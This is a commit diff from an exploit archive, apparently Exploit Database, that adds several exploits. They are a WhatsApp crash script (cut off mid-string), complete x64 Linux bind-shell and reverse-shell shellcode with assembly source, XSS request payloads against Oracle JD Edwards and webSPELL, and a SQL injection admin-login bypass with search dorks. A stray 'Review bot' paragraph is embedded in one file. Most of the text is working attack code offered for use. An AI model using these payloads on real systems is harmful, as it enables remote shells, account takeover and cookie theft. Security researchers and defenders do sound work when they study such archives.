Update: 2014-12-29

10 new exploits
Offensive Security 2014-12-29 10:19:37 +00:00
parent c329fa003a
commit fa9aebca13
11 changed files with 1034 additions and 207 deletions

424
files.csv


104
platforms/android/remote/35637.py Executable file

@ -0,0 +1,104 @@
#!/usr/bin/python
#-*- coding: utf-8 -*
# Title: WhatsApp Remote Reboot/Crash App Android
# Product: WhatsApp
# Vendor Homepage: http://www.whatsapp.com
# Vulnerable Version(s): 2.11.476
# Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4
# Date: 26/12/2014
# #RemoteExecution - www.remoteexecution.net
#
# Author Exploit:
# Daniel Godoy @0xhielasangre <danielgodoy@gobiernofederal.com>
# Credits:
# Gonza Cabrera
#
# Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
#
# Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even
# engaging in an interactive conversation over WhatsApp protocol
#
import argparse, sys, os, csv
from Yowsup.Common.utilities import Utilities
from Yowsup.Common.debugger import Debugger
from Yowsup.Common.constants import Constants
from Examples.CmdClient import WhatsappCmdClient
from Examples.EchoClient import WhatsappEchoClient
from Examples.ListenerClient import WhatsappListenerClient
from Yowsup.Registration.v1.coderequest import WACodeRequest
from Yowsup.Registration.v1.regrequest import WARegRequest
from Yowsup.Registration.v1.existsrequest import WAExistsRequest
from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2
from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
from Yowsup.Contacts.contacts import WAContactsSyncRequest
import threading,time, base64
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
COUNTRIES_CSV = "countries.csv"
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
######## Yowsup Configuration file #####################
# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n
# phone: Your full phone number including country code, without '+' or '00'
# id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup
# on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions
# of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on
# a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials
# or want to register, you can leave this field blank or set it to some random text.
# password: Password to use for login. You obtain this password when you register using Yowsup.
######################################################
MINE_CONFIG ="config"
def getCredentials(config = DEFAULT_CONFIG):
if os.path.isfile(config):
f = open(config)
phone = ""
idx = ""
pw = ""
cc = ""
try:
for l in f:
line = l.strip()
if len(line) and line[0] not in ('#',';'):
prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
varname = prep[0].strip()
val = prep[1].strip()
if varname == "phone":
phone = val
elif varname == "id":
idx = val
elif varname =="password":
pw =val
elif varname == "cc":
cc = val
return (cc, phone, idx, pw);
except:
pass
return 0
def main(phone):
credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )
if credentials:
countryCode, login, identity, password = credentials
identity = Utilities.processIdentity(identity)
password = base64.b64decode(password)
# Custom message that will crash WhatsApp
message = message = "#RemoteExecution?


@ -0,0 +1,248 @@
/*
* Author: Sean Dillon
* Copyright: (c) 2014 CAaNES, LLC. (http://caanes.com)
* Release Date: December 19, 2014
*
* Description: x64 Linux null-free TCP bind port shellcode, optional 4 byte password
* Assembled Size: 81 bytes, 96 with password
* Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64
* License: http://opensource.org/license/MIT
*
* Build/Run: gcc -m64 -z execstack -fno-stack-protector bindshell.c -o bindshell.out
* ./bindshell.out &
* nc localhost 4444
*/
/*
* NOTE: This C code binds on port 4444 and does not have the password option enabled.
* The end of this file contains the .nasm source code and instructions for building from that.
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] =
"\x31\xf6" /* xor %esi,%esi */
"\xf7\xe6" /* mul %esi */
"\xff\xc6" /* inc %esi */
"\x6a\x02" /* pushq $0x2 */
"\x5f" /* pop %rdi */
"\x04\x29" /* add $0x29,%al */
"\x0f\x05" /* syscall */
"\x50" /* push %rax */
"\x5f" /* pop %rdi */
"\x52" /* push %rdx */
"\x52" /* push %rdx */
"\xc6\x04\x24\x02" /* movb $0x2,(%rsp) */
"\x66\xc7\x44\x24\x02\x11\x5c" /* movw $0x5c11,0x2(%rsp) */
"\x54" /* push %rsp */
"\x5e" /* pop %rsi */
"\x52" /* push %rdx */
"\x6a\x10" /* pushq $0x10 */
"\x5a" /* pop %rdx */
"\x6a\x31" /* pushq $0x31 */
"\x58" /* pop %rax */
"\x0f\x05" /* syscall */
"\x5e" /* pop %rsi */
"\xb0\x32" /* mov $0x32,%al */
"\x0f\x05" /* syscall */
"\xb0\x2b" /* mov $0x2b,%al */
"\x0f\x05" /* syscall */
"\x50" /* push %rax */
"\x5f" /* pop %rdi */
"\x6a\x03" /* pushq $0x3 */
"\x5e" /* pop %rsi */
"\xff\xce" /* dec %esi */
"\xb0\x21" /* mov $0x21,%al */
"\x0f\x05" /* syscall */
"\x75\xf8" /* jne 35 <dupe_loop> */
"\x56" /* push %rsi */
"\x5a" /* pop %rdx */
"\x56" /* push %rsi */
"\x48\xbf\x2f\x2f\x62\x69\x6e" /* movabs $0x68732f6e69622f2f,%rdi */
"\x2f\x73\x68" /* . */
"\x57" /* push %rdi */
"\x54" /* push %rsp */
"\x5f" /* pop %rdi */
"\xb0\x3b" /* mov $0x3b,%al */
"\x0f\x05" /* syscall */;
main(void)
{
printf("Shellcode length: %d\n", (int)strlen(shellcode));
/* pollute registers and call shellcode */
__asm__ ( "mov $0xffffffffffffffff, %rax\n\t"
"mov %rax, %rbx\n\t"
"mov %rax, %rcx\n\t"
"mov %rax, %rdx\n\t"
"mov %rax, %rsi\n\t"
"mov %rax, %rdi\n\t"
"mov %rax, %rbp\n\t"
"call shellcode" );
}
/* --------------------------------------------------------------------------------------
; Author: Sean Dillon
; Company: CAaNES, LLC. (http://caanes.com)
; Release Date: December 19, 2014
;
; Description: x64 Linux null-free bind TCP port shellcode, optional 4 byte password
; Assembled Size: 81 bytes, 96 with password
; Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64
; License: http://opensource.org/license/MIT
;
; Build/Run: nasm -f elf64 -o bindshell.o bindshell.nasm
; ld -o bindshell bindshell.o
; objdump -d --disassembler-options=addr64 bindshell
BITS 64
global _start
section .text
; settings
%define USEPASSWORD ; comment this to not require password
PASSWORD equ 'Z~r0' ; cmp dword (SEGFAULT on fail; no bruteforce/cracking/etc.)
PORT equ 0x5c11 ; default 4444
; syscall kernel opcodes
SYS_SOCKET equ 0x29
SYS_BIND equ 0x31
SYS_LISTEN equ 0x32
SYS_ACCEPT equ 0x2b
SYS_DUP2 equ 0x21
SYS_EXECVE equ 0x3b
; argument constants
AF_INET equ 0x2
SOCK_STREAM equ 0x1
_start:
; High level psuedo-C overview of shellcode logic:
;
; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
; struct sockaddr = {AF_INET; [PORT; 0x0; 0x0]}
;
; bind(sockfd, &sockaddr, 16)
; listen(sockfd, 0)
; client = accept(sockfd, &sockaddr, 16)
;
; read(client, *pwbuf, 16) // 16 > 4
; if (pwbuf != PASSWORD) goto drop
;
; dup2(client, STDIN+STDOUT+STDERR)
; execve("/bin/sh", NULL, NULL)
create_sock:
; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
xor esi, esi ; 0 out rsi
mul esi ; 0 out rax, rdx
; rdx = IPPROTO_IP (int: 0)
inc esi ; rsi = SOCK_STREAM (int: 1)
push AF_INET ; rdi = AF_INET (int: 2)
pop rdi
add al, SYS_SOCKET
syscall
; store sock
push rax
pop rdi ; rdi = sockfd
struct_sockaddr:
; struct sockaddr = {AF_INET; PORT; 0x0; 0x0}
push rdx ; 0 out the stack for struct
push rdx
mov byte [rsp], AF_INET ; sockaddr.sa_family = AF_INET (u_char)
mov word [rsp + 0x2], PORT ; sockaddr.sa_data[] = PORT (short)
push rsp
pop rsi ; rsi = &sockaddr
bind_port:
; bind(sockfd, const struct sockaddr *addr, 16)
push rdx ; save 0 for rsi in SYS_LISTEN
push 0x10 ; rdx = 16 (sizeof sockaddr)
pop rdx
push SYS_BIND
pop rax
syscall
server_listen:
; listen(sockfd, 0)
pop rsi ; backlog = 0 (int)
mov al, SYS_LISTEN
syscall
client_accept:
; client = accept(sockfd, struct sockaddr *addr, 16)
mov al, SYS_ACCEPT
syscall
; store client
push rax
pop rdi ; rdi = client
; no need to close parent, save bytes
%ifdef USEPASSWORD
password_check:
; password = read(client, *buf, 4)
push rsp
pop rsi ; rsi = &buf (char*)
; rdx = 0x10, >4 bytes
xor eax, eax ; SYS_READ = 0x0
syscall
cmp dword [rsp], PASSWORD ; simple comparison
jne drop ; bad pw, abort
%endif
dupe_sockets:
; dup2(client, STDIN)
; dup2(client, STDOUT)
; dup2(client, STERR)
push 0x3 ; loop down file descriptors for I/O
pop rsi
dupe_loop:
dec esi
mov al, SYS_DUP2
syscall
jne dupe_loop
exec_shell:
; execve('//bin/sh', NULL, NULL)
push rsi ; *argv[] = 0
pop rdx ; *envp[] = 0
push rsi ; '\0'
mov rdi, '//bin/sh' ; str
push rdi
push rsp
pop rdi ; rdi = &str (char*)
mov al, SYS_EXECVE ; we fork with this syscall
syscall
drop:
; password check failed, crash program with BADINSTR/SEGFAULT
;--------------------------------------------------------------------------------------*/
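Review bot: The nasm comment on the execve call at the exec_shell label, `mov al, SYS_EXECVE ; we fork with this syscall`, is incorrect: execve(2) replaces the calling process image and does not return on success, so no child process is created; it should read `mov al, SYS_EXECVE ; execve replaces this process image, never returns on success`. The identical comment appears at the exec_shell label of the reverse-shell file in this commit and should be corrected there too. Separately, `main(void)` is declared without a return type in both C harnesses; that is implicit int, which C99 and later reject in conforming mode and gcc warns about, so declare it `int main(void)`. This file also declares `unsigned char shellcode[]` while the reverse-shell file uses `char shellcode[]`, and the `strlen(shellcode)` call here produces a pointer-sign warning that `strlen((const char *)shellcode)` would avoid; picking one declaration for both files would keep them consistent.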


@ -0,0 +1,246 @@
/*
* Author: Sean Dillon
* Copyright: (c) 2014 CAaNES, LLC. (http://caanes.com)
* Release Date: December 19, 2014
*
* Description: x64 Linux null-free reverse TCP shellcode, optional 4 byte password
* Assembled Size: 77 - 85 bytes, 90 - 98 with password
* Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64
* License: http://opensource.org/license/MIT
*
* Build/Run: gcc -m64 -z execstack -fno-stack-protector reverseshell.c -o reverseshell.out
* nc -l -p 4444
*/
/*
* NOTE: This C code connects to 127.0.0.1:4444 and does not have the password option enabled.
* Because the IP 127.0.0.1 contains null-bytes, a mask has to be used, adding 8 bytes.
* The end of this file contains the .nasm source code and instructions for building from that.
*/
#include <stdio.h>
#include <string.h>
char shellcode[] =
"\x31\xf6" /* xor %esi,%esi */
"\xf7\xe6" /* mul %esi */
"\xff\xc6" /* inc %esi */
"\x6a\x02" /* pushq $0x2 */
"\x5f" /* pop %rdi */
"\x04\x29" /* add $0x29,%al */
"\x0f\x05" /* syscall */
"\x50" /* push %rax */
"\x5f" /* pop %rdi */
"\x52" /* push %rdx */
"\x52" /* push %rdx */
"\xc7\x44\x24\x04\x7d\xff\xfe" /* movl $0xfefeff7d,0x4(%rsp) */
"\xfe" /* . */
"\x81\x44\x24\x04\x02\x01\x01" /* addl $0x2010102,0x4(%rsp) */
"\x02" /* . */
"\x66\xc7\x44\x24\x02\x11\x5c" /* movw $0x5c11,0x2(%rsp) */
"\xc6\x04\x24\x02" /* movb $0x2,(%rsp) */
"\x54" /* push %rsp */
"\x5e" /* pop %rsi */
"\x6a\x10" /* pushq $0x10 */
"\x5a" /* pop %rdx */
"\x6a\x2a" /* pushq $0x2a */
"\x58" /* pop %rax */
"\x0f\x05" /* syscall */
"\x6a\x03" /* pushq $0x3 */
"\x5e" /* pop %rsi */
"\xff\xce" /* dec %esi */
"\xb0\x21" /* mov $0x21,%al */
"\x0f\x05" /* syscall */
"\x75\xf8" /* jne 39 <dupe_loop> */
"\x56" /* push %rsi */
"\x5a" /* pop %rdx */
"\x56" /* push %rsi */
"\x48\xbf\x2f\x2f\x62\x69\x6e" /* movabs $0x68732f6e69622f2f,%rdi */
"\x2f\x73\x68" /* . */
"\x57" /* push %rdi */
"\x54" /* push %rsp */
"\x5f" /* pop %rdi */
"\xb0\x3b" /* mov $0x3b,%al */
"\x0f\x05" /* syscall */;
main(void)
{
printf("Shellcode length: %d\n", (int)strlen(shellcode));
/* pollute registers and call shellcode */
__asm__ ( "mov $0xffffffffffffffff, %rax\n\t"
"mov %rax, %rbx\n\t"
"mov %rax, %rcx\n\t"
"mov %rax, %rdx\n\t"
"mov %rax, %rsi\n\t"
"mov %rax, %rdi\n\t"
"mov %rax, %rbp\n\t"
"call shellcode" );
}
/* --------------------------------------------------------------------------------------
; Author: Sean Dillon
; Company: CAaNES, LLC. (http://caanes.com)
; Release Date: December 19, 2014
;
; Description: x64 Linux null-free reverse TCP shellcode, optional 4 byte password
; Assembled Size: 77 - 85 bytes, 90 - 98 with password
; Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64
; License: http://opensource.org/license/MIT
;
; Build/Run: nasm -f elf64 -o reverseshell.o reverseshell.nasm
; ld -o reverseshell reverseshell.o
; objdump -d --disassembler-options=addr64 reverseshell
BITS 64
global _start
section .text
; settings
%define USEPASSWORD ; comment this to not require password
PASSWORD equ 'Z~r0' ; cmp dword (SEGFAULT on fail; no bruteforce/cracking/etc.)
IP equ 0x0100007f ; default 127.0.0.1, contains nulls so will need mask
PORT equ 0x5c11 ; default 4444
; change the null-free mask as needed
%define NULLFREE_MASK 0x02010102 ; comment this out if no .0. in IP, save 8 bytes
%ifdef NULLFREE_MASK
%define NULLFREE_IP IP - NULLFREE_MASK
%else
%define NULLFREE_IP IP
%endif
; syscall kernel opcodes
SYS_SOCKET equ 0x29
SYS_CONNECT equ 0x2a
SYS_DUP2 equ 0x21
SYS_EXECVE equ 0x3b
; argument constants
AF_INET equ 0x2
SOCK_STREAM equ 0x1
_start:
; High level psuedo-C overview of shellcode logic:
;
; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
; IP = NULLFREE_IP + NULLFREE_MASK
; struct sockaddr = {AF_INET; [PORT; IP; 0x0]}
;
; connect(sockfd, &sockaddr, 16)
;
; read(sockfd, *pwbuf, 16) // 16 > 4
; if (pwbuf != PASSWORD) goto drop
;
; dup2(sockfd, STDIN+STDOUT+STDERR)
; execve("/bin/sh", NULL, NULL)
create_sock:
; sockfd = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
xor esi, esi ; 0 out rsi
mul esi ; 0 out rax, rdx
; rdx = IPPROTO_IP (int: 0)
inc esi ; rsi = SOCK_STREAM (int: 1)
push AF_INET ; rdi = AF_INET (int: 2)
pop rdi
add al, SYS_SOCKET
syscall
; copy socket descriptor to rdi for future use
push rax
pop rdi
struct_sockaddr:
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = inet_addr("127.0.0.1")
; bzero(&server.sin_zero, 8)
push rdx
push rdx
mov dword [rsp + 0x4], NULLFREE_IP
%ifdef NULLFREE_MASK
add dword [rsp + 0x4], NULLFREE_MASK
%endif
mov word [rsp + 0x2], PORT
mov byte [rsp], AF_INET
connect_sock:
; connect(sockfd, (struct sockaddr *)&server, sockaddr_len)
push rsp
pop rsi
push 0x10
pop rdx
push SYS_CONNECT
pop rax
syscall
%ifdef USEPASSWORD
password_check:
; password = read(sockfd, *buf, 4)
; rsi = &buf (char*)
; rdx = 0x10, >4 bytes
xor eax, eax ; SYS_READ = 0x0
syscall
cmp dword [rsp], PASSWORD ; simple comparison
jne drop ; bad pw, abort
%endif
dupe_sockets:
; dup2(sockfd, STDIN)
; dup2(sockfd, STDOUT)
; dup2(sockfd, STERR)
push 0x3 ; loop down file descriptors for I/O
pop rsi
dupe_loop:
dec esi
mov al, SYS_DUP2
syscall
jne dupe_loop
exec_shell:
; execve('//bin/sh', NULL, NULL)
push rsi ; *argv[] = 0
pop rdx ; *envp[] = 0
push rsi ; '\0'
mov rdi, '//bin/sh' ; str
push rdi
push rsp
pop rdi ; rdi = &str (char*)
mov al, SYS_EXECVE ; we fork with this syscall
syscall
drop:
; password check failed, crash program with BADINSTR/SEGFAULT
;--------------------------------------------------------------------------------------*/


@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/47479/info
Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This vulnerability affects the following supported versions:
8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
http://XXX.XXX.XXX.XXX/jde/E1Menu.maf
Parameter: jdeowpBackButtonProtect
* The GET request has been set to: >'"><script>alert(20639)</script>
/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED&%3E%27%22%3E%3Cscript%3Ealert%2820639%29%3C%2Fscript%3E=123 HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=00002ZzkuqI4ibppzAAcyOOuBnh:14p7umbnp; e1MenuState=100003759|
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX


@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/47479/info
Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This vulnerability affects the following supported versions:
8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
http://XXX.XXX.XXX.XXX/jde/E1Menu_Menu.mafService
Parameter: e1.namespace
* The POST request has been set to: %2Balert%2835890%29%2B
/jde/E1Menu_Menu.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu&e1.service=E1Menu_Menu&e1.namespace=%2Balert%2835890%29%2B HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000b7KChC3OjQct7TOz9U6NMhK:14p7umbnp; e1MenuState=100003759|
Content-Length: 12
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
Content-Type: application/x-www-form-urlencoded
Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED
nodeId=&a=lc


@ -0,0 +1,33 @@
source: http://www.securityfocus.com/bid/47479/info
Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This vulnerability affects the following supported versions:
8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
http://XXX.XXX.XXX.XXX/jde/E1Menu_OCL.mafService
Parameter: e1.namespace
* The GET request has been set to: %2Balert%2848981%29%2B
/jde/E1Menu_OCL.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu&e1.service=E1Menu_OCL&e1.namespace=%2Balert%2848981%29%2B&timestamp=1290796450377
HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000xXDQLJurffGMVi6Du_UnL0Z:14p7umbnp; e1MenuState=100003759|
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED


@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/47479/info
Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This vulnerability affects the following supported versions:
8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
http://XXX.XXX.XXX.XXX/jde/MafletClose.mafService
Parameter: RENDER_MAFLET
* The GET request has been set to: E1Menu"%2Balert%2844218%29%2B"
/jde/MafletClose.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu"%2Balert%2844218%29%2B"&e1.service=MafletClose&e1.namespace= HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000FGUGWkc2Y9q-dO3GqshuPVQ:14p7umbnp; e1MenuState=100003759|
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED


@ -0,0 +1,33 @@
source: http://www.securityfocus.com/bid/47479/info
Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This vulnerability affects the following supported versions:
8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
* http://XXX.XXX.XXX.XXX/jde/JASMafletMafBrowserClose.mafService
Parameter: jdemafjasLinkTarget
* The GET request has been set to: E1MENUMAIN_3860308878877903872"%2Balert%28222735%29%2B"
/jde/JASMafletMafBrowserClose.mafService?jdemafjasFrom=BrowserClose&e1.mode=view&jdeLoginAction=LOGOUT&e1.state=maximized&jdemafjasLinkTarget=E1MENUMAIN_3860308878877903872"%2Balert%28222735%29%2B"&RENDER_MAFLET=E1Menu&jdemafjasLauncher=PSFT_TE_V3_SW&e1.service=JASMafletMafBrowserClose&e1.namespace=
HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=00003wyVho0_-Ma0fQp67cuqdCs:14p7ulc8o; e1MenuState=100003759|
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED

40
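--- /dev/null
+++ b/platforms/php/webapps/35492.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Free Article Submissions SQL Injection Vulnerability
+# Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal"
+inurl:/category.php?id=2 "Arts & Entertainment"
+# Date: 07/12/2014
+# Exploit Author: BarrabravaZ
+# Vendor Homepage: http://www.articlesetup.com/
+# Software Link: [download link if available]
+# Version: 1.00
+# Tested on: Windows
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+«««:»»» Author will be not responsible for any damage. «««:»»»
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+x
+x Issue:
+x SQL Injection Bypass Login
+x
+x Risk level: High
+x ~ The remote attacker has the possibility to manage the website.
+x ~ The remote attacker is able to login into website with access level as admin.
+x
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+##
+## Proof Of Concept:
+## http://127.0.0.1/admin/login.php
+##
+## Username : ' OR 1=1 #
+## Password : barrabravaz
+##
+##
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+Special thanks to:
+[+] Chae Cryptn [+] Slackerc0de Family [+] SBH Pentester [+] Pocong XXX
+[+] Madleets [+] Xplorecrew [+] Hackernewbie [+] Yogyacarderlink
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx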

14
platforms/php/webapps/35643.txt Executable file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/47500/info
webSPELL is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
webSPELL 4.2.2a is affected; other versions may also be vulnerable.
http://www.example.com/index.php?site=newsletter&pass=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
http://www.example.com/index.php?site=messenger&action=touser&touser=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
http://www.example.com/admin/admincenter.php?site=users&action=addtoclan&id=1&page=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
http://www.example.com/admin/admincenter.php?site=squads&action=edit&squadID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
http://www.example.com/admin/admincenter.php?site=contact&action=edit&contactID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E